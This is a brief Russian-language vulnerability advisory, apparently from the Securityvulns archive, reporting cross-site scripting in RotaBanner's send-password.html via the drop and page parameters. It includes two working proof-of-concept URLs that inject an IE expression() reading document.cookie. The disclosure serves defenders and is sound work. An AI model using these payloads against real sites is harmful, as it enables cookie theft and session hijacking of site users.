Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:21548
HistoryApr 01, 2009 - 12:00 a.m.

New vulnerabilities in RotaBanner

2009-04-0100:00:00
vulners.com
12

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною новых Cross-Site Scripting уязвимостях в
баннерной системе RotaBanner.

XSS (IE):

Уязвимости в файле send-password.html в параметрах drop и page.

http://site/send-password.html?drop=''style='xss:expression(alert(document.cookie))'&action-send=true

http://site/send-password.html?drop='&page='style='xss:expression(alert(document.cookie))'&action-send=true

Уязвима версия RotaBanner Local 3 и предыдущие версии.

Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/3014/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua